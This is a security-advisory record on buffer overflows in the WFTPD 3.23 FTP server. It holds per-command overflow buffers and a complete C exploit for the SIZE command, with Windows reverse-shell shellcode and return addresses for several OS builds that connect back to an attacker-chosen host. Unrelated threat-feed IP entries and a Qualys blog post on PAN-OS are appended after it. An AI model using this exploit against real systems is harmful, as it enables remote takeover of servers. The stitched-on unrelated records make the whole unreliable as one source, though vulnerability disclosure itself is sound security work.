ID SECURITYVULNS:DOC:13977 Type securityvulns Reporter Securityvulns Modified 2006-08-21T00:00:00
Description
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
<http://www.wftpd.com/wftpdreg.htm> WFTPD Server "is the entry level FTP
server for all Windows platforms". Multiple buffer overflow
vulnerabilities have been found in WFTPD server allowing remote attackers
to cause the product to execute arbitrary code.
DETAILS
Vulnerable Systems:
* WFTPD server version 3.23
The following command combinations can be used to cause the WFTPD to
execute arbitrary code by overflowing its EIP register, NOTE the WFTPD
option: "restrict to home directory and below" should be set to disabled:
buffer["CWD "]+["/"]+["\x90" * 261]+[0x41414141]+["\r\n"]
EIP = 0x41414141
The information has been provided by <mailto:h07@interia.pl> h07.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
{"id": "SECURITYVULNS:DOC:13977", "bulletinFamily": "software", "title": "[NT] WFTPD Multiple Buffer Overflows (CWD, DELE, MDTM, MKD, RMD, MLST, RNFR, SIZE, XCWD, XMKD, XRMD)", "description": "The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com\r\n- - promotion\r\n\r\nThe SecuriTeam alerts list - Free, Accurate, Independent.\r\n\r\nGet your security news from a reliable source.\r\nhttp://www.securiteam.com/mailinglist.html \r\n\r\n- - - - - - - - -\r\n\r\n\r\n\r\n WFTPD Multiple Buffer Overflows (CWD, DELE, MDTM, MKD, RMD, MLST, RNFR, \r\nSIZE, XCWD, XMKD, XRMD)\r\n------------------------------------------------------------------------\r\n\r\n\r\nSUMMARY\r\n\r\n <http://www.wftpd.com/wftpdreg.htm> WFTPD Server "is the entry level FTP \r\nserver for all Windows platforms". Multiple buffer overflow \r\nvulnerabilities have been found in WFTPD server allowing remote attackers \r\nto cause the product to execute arbitrary code.\r\n\r\nDETAILS\r\n\r\nVulnerable Systems:\r\n * WFTPD server version 3.23\r\n\r\nThe following command combinations can be used to cause the WFTPD to \r\nexecute arbitrary code by overflowing its EIP register, NOTE the WFTPD \r\noption: "restrict to home directory and below" should be set to disabled:\r\nbuffer["CWD "]+["/"]+["\x90" * 261]+[0x41414141]+["\r\n"]\r\nEIP = 0x41414141\r\n\r\nbuffer["DELE "]+["/"]+["\x90" * 297]+[0x41414141]+["\r\n"]\r\nEIP = 0x41414141\r\n\r\nbuffer["MDTM "]+["/"]+["\x90" * 273]+[0x41414141]+["\r\n"]\r\nEIP = 0x41414141\r\n\r\nbuffer["MKD "]+["/"]+["\x90" * 265]+[0x41414141]+["\r\n"]\r\nEIP = 0x41414141\r\n\r\nbuffer["RMD "]+["/"]+["\x90" * 261]+[0x41414141]+["\r\n"]\r\nEIP = 0x41414141\r\n\r\nbuffer["MLST "]+["/"]+["\x90" * 517]+[0x41414141]+["\r\n"]\r\nEIP = 0x41414141\r\n\r\nbuffer["SIZE "]+["/"]+["\x90" * 525]+[0x41414141]+["\r\n"]\r\nEIP = 0x41414141\r\n\r\nbuffer["XCWD "]+["/"]+["\x90" * 261]+[0x41414141]+["\r\n"]\r\nEIP = 0x41414141\r\n\r\nbuffer["XMKD "]+["/"]+["\x90" * 265]+[0x41414141]+["\r\n"]\r\nEIP = 0x41414141\r\n\r\nbuffer["XRMD "]+["/"]+["\x90" * 261]+[0x41414141]+["\r\n"]\r\nEIP = 0x41414141\r\n\r\nExploit:\r\n///////////////////////////////////////////////////////////////////////\r\n// WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit ///////\r\n// coded by h07 <h07@interia.pl> /////////////////////////////////////\r\n// tested on XP SP2 polish, 2000 SP4 polish ///////////////////////////\r\n///////////////////////////////////////////////////////////////////////\r\n\r\n#include <winsock2.h>\r\n#define BUFF_SIZE 1024\r\n#define PORT 21\r\n\r\n//win32 reverse shellcode (metasploit.com)\r\n\r\nchar shellcode[] =\r\n\r\n"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb6"\r\n"\x10\x92\x98\x83\xeb\xfc\xe2\xf4\x4a\x7a\x79\xd5\x5e\xe9\x6d\x67"\r\n"\x49\x70\x19\xf4\x92\x34\x19\xdd\x8a\x9b\xee\x9d\xce\x11\x7d\x13"\r\n"\xf9\x08\x19\xc7\x96\x11\x79\xd1\x3d\x24\x19\x99\x58\x21\x52\x01"\r\n"\x1a\x94\x52\xec\xb1\xd1\x58\x95\xb7\xd2\x79\x6c\x8d\x44\xb6\xb0"\r\n"\xc3\xf5\x19\xc7\x92\x11\x79\xfe\x3d\x1c\xd9\x13\xe9\x0c\x93\x73"\r\n"\xb5\x3c\x19\x11\xda\x34\x8e\xf9\x75\x21\x49\xfc\x3d\x53\xa2\x13"\r\n"\xf6\x1c\x19\xe8\xaa\xbd\x19\xd8\xbe\x4e\xfa\x16\xf8\x1e\x7e\xc8"\r\n"\x49\xc6\xf4\xcb\xd0\x78\xa1\xaa\xde\x67\xe1\xaa\xe9\x44\x6d\x48"\r\n"\xde\xdb\x7f\x64\x8d\x40\x6d\x4e\xe9\x99\x77\xfe\x37\xfd\x9a\x9a"\r\n"\xe3\x7a\x90\x67\x66\x78\x4b\x91\x43\xbd\xc5\x67\x60\x43\xc1\xcb"\r\n"\xe5\x53\xc1\xdb\xe5\xef\x42\xf0\xb6\x10\x92\x98\xd0\x78\x92\x98"\r\n"\xd0\x43\x1b\x79\x23\x78\x7e\x61\x1c\x70\xc5\x67\x60\x7a\x82\xc9"\r\n"\xe3\xef\x42\xfe\xdc\x74\xf4\xf0\xd5\x7d\xf8\xc8\xef\x39\x5e\x11"\r\n"\x51\x7a\xd6\x11\x54\x21\x52\x6b\x1c\x85\x1b\x65\x48\x52\xbf\x66"\r\n"\xf4\x3c\x1f\xe2\x8e\xbb\x39\x33\xde\x62\x6c\x2b\xa0\xef\xe7\xb0"\r\n"\x49\xc6\xc9\xcf\xe4\x41\xc3\xc9\xdc\x11\xc3\xc9\xe3\x41\x6d\x48"\r\n"\xde\xbd\x4b\x9d\x78\x43\x6d\x4e\xdc\xef\x6d\xaf\x49\xc0\xfa\x7f"\r\n"\xcf\xd6\xeb\x67\xc3\x14\x6d\x4e\x49\x67\x6e\x67\x66\x78\x62\x12"\r\n"\xb2\x4f\xc1\x67\x60\xef\x42\x98";\r\n\r\nvoid config_shellcode(unsigned long ip, unsigned short port)\r\n {\r\n memcpy(&shellcode[184], &ip, 4);\r\n memcpy(&shellcode[190], &port, 2);\r\n }\r\n\r\nunsigned long target[] =\r\n {\r\n 0x7d16887b, //JMP ESI (XP SP2 polish)\r\n 0x776f2015, //JMP ESI (2000 SP4 polish)\r\n 0x7cb9e082, //JMP ESI (XP SP2 english)\r\n 0x7848a5f1, //JMP ESI (2000 SP4 english)\r\n 0x7ca96834 //JMP ESI (XP SP2 german)\r\n };\r\n\r\nchar buffer[BUFF_SIZE];\r\n\r\nmain(int argc, char *argv[])\r\n{\r\nint sock, id, opt, r_len;\r\nunsigned long eip;\r\nunsigned long connectback_IP;\r\nunsigned short connectback_port;\r\nstruct hostent *he;\r\nstruct sockaddr_in client;\r\nWSADATA wsa;\r\n\r\nprintf("\n[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow \r\nexploit\n");\r\nprintf("[*] coded by h07 <h07@interia.pl>\n");\r\n\r\nif(argc < 8)\r\n {\r\n printf("[*] usage:..\n %s <ID> <opt> <host> <user> <pass> \r\n<connectback_IP> <connectback_port>\n\n", argv[0]);\r\n printf("[*] ID list:\n");\r\n printf("[>] 0: XP SP2 polish\n");\r\n printf("[>] 1: 2000 SP4 polish\n");\r\n printf("[>] 2: XP SP2 english\n");\r\n printf("[>] 3: 2000 SP4 english\n");\r\n printf("[>] 4: XP SP2 german\n\n");\r\n printf("[*] opt - WFTPD option 'restrict to home directory and \r\nbelow'\n");\r\n printf("[>] 0: disabled\n");\r\n printf("[>] 1: enabled\n\n");\r\n printf("[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444\n\n", \r\nargv[0]);\r\n exit(0);\r\n }\r\n\r\nWSAStartup(MAKEWORD(2, 0), &wsa);\r\n\r\nid = atoi(argv[1]);\r\nopt = atoi(argv[2]);\r\n\r\nif((id > 4) || (id < 0))\r\n {\r\n printf("[-] ID error: unknown target\n");\r\n exit(-1);\r\n }\r\n \r\nif((opt > 1) || (opt < 0))\r\n {\r\n printf("[-] opt error: unknown option\n");\r\n exit(-1);\r\n }\r\n \r\neip = target[id];\r\nconnectback_IP = inet_addr(argv[6]) ^ (ULONG)0x989210b6;\r\nconnectback_port = htons(atoi(argv[7])) ^ (USHORT)0x9892;\r\nconfig_shellcode(connectback_IP, connectback_port);\r\n\r\nsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n\r\nif((he = gethostbyname(argv[3])) == NULL)\r\n {\r\n printf("[-] Unable to resolve\n");\r\n exit(-1);\r\n }\r\n \r\nclient.sin_addr = *((struct in_addr *)he->h_addr);\r\nclient.sin_port = htons(PORT);\r\nclient.sin_family = AF_INET;\r\n\r\nif(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)\r\n {\r\n printf("[-] error: connect()\n");\r\n exit(-1);\r\n }\r\n\r\nrecv(sock, buffer, BUFF_SIZE -1, 0);\r\n\r\n//USER\r\nmemset(buffer, 0, BUFF_SIZE);\r\nsprintf(buffer, "USER %s\r\n", argv[4]);\r\nsend(sock, buffer, strlen(buffer), 0);\r\nrecv(sock, buffer, BUFF_SIZE -1, 0);\r\nprintf("[*] FTP response: %s", buffer);\r\n\r\n//PASS\r\nmemset(buffer, 0, BUFF_SIZE);\r\nsprintf(buffer, "PASS %s\r\n", argv[5]);\r\nsend(sock, buffer, strlen(buffer), 0);\r\nrecv(sock, buffer, BUFF_SIZE -1, 0);\r\nprintf("[*] FTP response: %s", buffer);\r\n\r\nif(strstr(buffer, "530") != 0) exit(-1);\r\n\r\n//SIZE\r\nmemset(buffer, 0x90, BUFF_SIZE);\r\nmemcpy(buffer, "SIZE ", 5);\r\n\r\nswitch(opt)\r\n {\r\n case 0:\r\n {\r\n memcpy(buffer + 5, "/", 1);\r\n r_len = 531;\r\n break;\r\n }\r\n case 1:\r\n {\r\n memcpy(buffer + 5, "//", 2);\r\n r_len = 532;\r\n break;\r\n }\r\n }\r\n\r\nmemcpy(buffer + 7, shellcode, sizeof(shellcode) -1);\r\n*((unsigned long*)(&buffer[r_len])) = eip;\r\nmemcpy(buffer + (r_len + 4), "\r\n\x00", 3);\r\n\r\n\r\nif(send(sock, buffer, strlen(buffer), 0) != -1)\r\n printf("[+] sending buffer: ok\n");\r\n else\r\n printf("[-] sending buffer: failed\n");\r\n \r\nprintf("[*] press enter to quit\n");\r\ngetchar();\r\n}\r\n\r\n//EoF\r\n\r\n\r\nADDITIONAL INFORMATION\r\n\r\nThe information has been provided by <mailto:h07@interia.pl> h07.\r\n\r\n\r\n\r\n======================================== \r\n\r\n\r\nThis bulletin is sent to members of the SecuriTeam mailing list. \r\nTo unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com \r\nIn order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com \r\n\r\n\r\n==================== \r\n==================== \r\n\r\nDISCLAIMER: \r\nThe information in this bulletin is provided "AS IS" without warranty of any kind. \r\nIn no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. \r\n\r\n\r\n\r\n", "published": "2006-08-21T00:00:00", "modified": "2006-08-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13977", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-08-31T11:10:18", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB953331", "KB2874216", "KB980408", "KB3191913", "KB981401", "KB2510690", "KB317244", "KB2501721", "KB2785908", "KB2526297"]}], "modified": "2018-08-31T11:10:18", "rev": 2}, "vulnersScore": 0.1}, "affectedSoftware": []}
{"rst": [{"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **71[.]161.90.231** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **13**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **generic**.\nASN 13977: (First IP 71.161.80.0, Last IP 71.161.101.255).\nASN Name \"CTELCO\" and Organisation \"FAIRPOINT COMMUNICATIONS INC\".\nASN hosts 3324 domains.\nGEO IP information: City \"Rindge\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:52B01266-780C-3B3C-9169-E584951D6B80", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: 71.161.90.231", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **64[.]222.163.248** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **24**.\n First seen: 2021-01-19T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **generic**.\nASN 13977: (First IP 64.222.158.0, Last IP 64.222.165.255).\nASN Name \"CTELCO\" and Organisation \"FAIRPOINT COMMUNICATIONS INC\".\nASN hosts 3324 domains.\nGEO IP information: City \"Windham\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-19T00:00:00", "id": "RST:798FA212-28D6-3CF5-80C8-1FD1EFFC3111", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: 64.222.163.248", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-28T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **72[.]95.96.187** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **13**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-02-28T03:00:00.\n IOC tags: **generic**.\nASN 13977: (First IP 72.95.88.0, Last IP 72.95.127.255).\nASN Name \"CTELCO\" and Organisation \"FAIRPOINT COMMUNICATIONS INC\".\nASN hosts 3324 domains.\nGEO IP information: City \"Sedgwick\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:D5A2D38F-D3FC-3ECE-81DD-A5A151006E06", "href": "", "published": "2021-03-01T00:00:00", "title": "RST Threat feed. IOC: 72.95.96.187", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-13T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **71[.]255.131.72** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **15**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-02-13T03:00:00.\n IOC tags: **generic**.\nASN 13977: (First IP 71.255.128.0, Last IP 71.255.159.255).\nASN Name \"CTELCO\" and Organisation \"FAIRPOINT COMMUNICATIONS INC\".\nASN hosts 3324 domains.\nGEO IP information: City \"Burlington\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:E9BDFB52-B9BE-35F0-964A-94AE5C078CF7", "href": "", "published": "2021-02-14T00:00:00", "title": "RST Threat feed. IOC: 71.255.131.72", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **71[.]169.175.100** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **52**.\n First seen: 2021-02-05T03:00:00, Last seen: 2021-02-06T03:00:00.\n IOC tags: **scan, generic**.\nASN 13977: (First IP 71.169.128.0, Last IP 71.169.191.255).\nASN Name \"CTELCO\" and Organisation \"FAIRPOINT COMMUNICATIONS INC\".\nASN hosts 3324 domains.\nGEO IP information: City \"Fairfax\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-05T00:00:00", "id": "RST:72DFC140-60A0-308A-8DE2-DD7B57991D71", "href": "", "published": "2021-02-07T00:00:00", "title": "RST Threat feed. IOC: 71.169.175.100", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **71[.]173.89.135** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **52**.\n First seen: 2021-02-05T03:00:00, Last seen: 2021-02-06T03:00:00.\n IOC tags: **scan, generic**.\nASN 13977: (First IP 71.173.64.0, Last IP 71.173.95.255).\nASN Name \"CTELCO\" and Organisation \"FAIRPOINT COMMUNICATIONS INC\".\nASN hosts 3324 domains.\nGEO IP information: City \"Fairfax\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-05T00:00:00", "id": "RST:B55B9BFD-61D4-3701-B0A4-850EA3D7F7E9", "href": "", "published": "2021-02-07T00:00:00", "title": "RST Threat feed. IOC: 71.173.89.135", "type": "rst", "cvss": {}}, {"lastseen": "2021-02-06T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **71[.]181.72.27** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **52**.\n First seen: 2021-02-05T03:00:00, Last seen: 2021-02-06T03:00:00.\n IOC tags: **scan, generic**.\nASN 13977: (First IP 71.181.66.0, Last IP 71.181.83.255).\nASN Name \"CTELCO\" and Organisation \"FAIRPOINT COMMUNICATIONS INC\".\nASN hosts 3324 domains.\nGEO IP information: City \"Fairfax\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-02-05T00:00:00", "id": "RST:0E49ECB8-D78A-32C9-8C16-65ADE8F8AF64", "href": "", "published": "2021-02-07T00:00:00", "title": "RST Threat feed. IOC: 71.181.72.27", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-13T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **71[.]181.71.106** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **42**.\n First seen: 2020-12-06T03:00:00, Last seen: 2020-12-13T03:00:00.\n IOC tags: **shellprobe**.\nASN 13977: (First IP 71.181.66.0, Last IP 71.181.83.255).\nASN Name \"CTELCO\" and Organisation \"FAIRPOINT COMMUNICATIONS INC\".\nASN hosts 3253 domains.\nGEO IP information: City \"Fairfield\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-06T00:00:00", "id": "RST:284E0D43-96ED-314F-8818-E23EEB3461D0", "href": "", "published": "2020-12-14T00:00:00", "title": "RST Threat feed. IOC: 71.181.71.106", "type": "rst", "cvss": {}}, {"lastseen": "2020-06-25T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **64[.]222.246.86** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **5**.\n First seen: 2019-09-29T03:00:00, Last seen: 2020-06-25T03:00:00.\n IOC tags: **generic**.\nASN 13977: (First IP 64.222.245.0, Last IP 64.222.255.255).\nASN Name \"CTELCO\" and Organisation \"FAIRPOINT COMMUNICATIONS INC\".\nASN hosts 3277 domains.\nGEO IP information: City \"Nashua\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-09-29T00:00:00", "id": "RST:ED5BE216-FC10-3583-80C3-233DACC975F7", "href": "", "published": "2020-12-06T00:00:00", "title": "RST Threat feed. IOC: 64.222.246.86", "type": "rst", "cvss": {}}, {"lastseen": "2020-12-04T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **64[.]223.254.177** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **34**.\n First seen: 2020-11-06T03:00:00, Last seen: 2020-12-04T03:00:00.\n IOC tags: **generic**.\nWe found that the IOC is used by: **necurs**.\nASN 13977: (First IP 64.223.246.0, Last IP 64.223.255.255).\nASN Name \"CTELCO\" and Organisation \"FAIRPOINT COMMUNICATIONS INC\".\nASN hosts 3277 domains.\nGEO IP information: City \"Goffstown\", Country \"United States\".\nIn according to RST Threat Feed the IP is related to **vmmrpliqv.com** malicious domains.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-11-06T00:00:00", "id": "RST:FBB06768-589F-31F5-9F47-F5E5CE03352C", "href": "", "published": "2020-12-05T00:00:00", "title": "RST Threat feed. IOC: 64.223.254.177", "type": "rst", "cvss": {}}], "qualysblog": [{"lastseen": "2020-09-22T19:42:32", "bulletinFamily": "blog", "cvelist": ["CVE-2020-2036", "CVE-2020-2037", "CVE-2020-2038", "CVE-2020-2039", "CVE-2020-2040", "CVE-2020-2041", "CVE-2020-2042", "CVE-2020-2043", "CVE-2020-2044"], "description": "On Sept 9, 2020, Palo Alto Networks published [nine security bulletins](<https://security.paloaltonetworks.com/>) addressing vulnerabilities in PAN-OS operating system versions 8.0 or later. One of the nine CVEs released, [CVE-2020-2040](<https://nvd.nist.gov/vuln/detail/CVE-2020-2040>), received a critical severity rating score of 9.8 based on the CVSS v3 Scoring system.\n\n[PAN-OS devices](<https://security.paloaltonetworks.com/CVE-2020-2040>) are vulnerable to CVE-2020-2040, when a Captive Portal or multi-factor authentication interface is enabled. Once exploited, an unauthenticated user can gain root privileges by sending a malicious request to the PAN-OS device. This vulnerability is rated as critical mainly for two reasons. First, it doesn\u2019t require any authentication; and second, it has the potential to disrupt system processes and execute arbitrary code injection.\n\nAccording to Shodan, more than ~5k PAN-OS devices are active, and accessible over the internet at the time when this blog was published. Also, based on internal analysis from Qualys only 4% of the systems are patched. Organizations need to take this vulnerability seriously, and patch immediately. \n\nImage Source: Shodan\n\nAlong with CVE-2020-2040, other vulnerabilities were also remedied by Palo Alto Networks:\n\n**CVE-ID**| **CVSS v3 Score** \n---|--- \nCVE-2020-204| 9.8 \nCVE-2020-2036| 8.8 \nCVE-2020-2041| 7.5 \nCVE-2020-2037| 7.2 \nCVE-2020-2038| 7.2 \nCVE-2020-2042| 7.2 \nCVE-2020-2039| 5.3 \nCVE-2020-2043| 3.3 \nCVE-2020-2044| 3.3 \n \n#### Affected Products:\n\nPAN-OS 9.1 \nPAN-OS 9.0 \nPAN-OS 8.1 \nPAN-OS 8.0\n\nA complete list of affected devices is available: [PAN-OS Security Advisory](<https://security.paloaltonetworks.com/CVE-2020-2040>).\n\n### Identification of Assets using Qualys VMDR\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) makes it easy to identify PAN-OS systems.\n\n_`operatingSystem:\"PAN-OS\"`_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u201cCVE-2020-2040\u201d. This helps in automatically grouping existing hosts with PAN-OS as well as any new PAN-OS hosts that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n## Discover PAN-OS Buffer Overflow \u201cCVE-2020-2040\u201d Vulnerability\n\nNow that hosts with PAN-OS are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like CVE-2020-2040 based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018CVE-2020-2040\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\n_`vulnerabilities.vulnerability.qid:13975`_\n\nThis will return a list of all impacted hosts.\n\n\n\nQID 13975 is available in signature version VULNSIGS-2.4.986-2 and above and can be detected using authenticated scanning.\n\nAlong with QID 13975, Qualys has released the following QIDs in the KnowledgeBase to address PAN-OS CVEs:\n\n * **QID 13975**: Palo Alto Networks PAN-OS Buffer Overflow Vulnerability\n * **QID 13971**: Palo Alto Networks PAN-OS Reflected Cross-Site Scripting (XSS) vulnerability\n * **QID 13977**: Palo Alto Networks PAN-OS Denial-Of-Service Vulnerability\n * **QID 13972**: Palo Alto Networks PAN-OS OS Command Injection Vulnerability\n * **QID 13973**: Palo Alto Networks PAN-OS OS Command Injection Vulnerability\n * **QID 13978**: Palo Alto Networks PAN-OS Management Web Interface Buffer Overflow Vulnerability\n * **QID 13974**: Palo Alto Networks PAN-OS Management Web Interface Denial-Of-Service Vulnerability\n * **QID 13979**: Palo Alto Networks PAN-OS Information Exposure Vulnerability\n * **QID 13980**: Palo Alto Networks PAN-OS Information Exposure Vulnerability\n\n\nUsing VMDR, the CVE-2020-2040 can be prioritized for the following real-time threat indicators (RTIs):\n\n * Remote Code Execution\n * Denial of Service\n * High Data Loss\n * High Lateral Movement\n * Easy Exploit\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n\n\nSimply click on the impacted assets for the PAN-OS threat feed to see the vulnerability and impacted host details. \n\n### Tracking via Dashboards\n\nWith VMDR Dashboard, you can track PAN-OS vulnerabilities, impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of CVE-2020-2040 vulnerability trends in your environment using the [Palo Alto Networks dashboard](<https://qualys-secure.force.com/discussions/s/article/000006406>).\n\n\n\n### Solution\n\nUsers are advised to update their PAN-OS installations to PAN-OS 8.1.15, PAN-OS 9.0.9, PAN-OS 9.1.3, and all later PAN-OS versions. \n\nFor information, see: [CVE-2020-2040 PAN-OS: Buffer overflow when Captive Portal or Multi-Factor Authentication (MFA) is enabled](<https://security.paloaltonetworks.com/CVE-2020-2040>).\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority PAN-OS vulnerability CVE-2020-2040.", "modified": "2020-09-22T15:00:00", "published": "2020-09-22T15:00:00", "id": "QUALYSBLOG:AFC401CA7733EFC24055842107977679", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "PAN-OS Critical Buffer Overflow Vulnerability (CVE-2020-2040) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR\u00ae", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}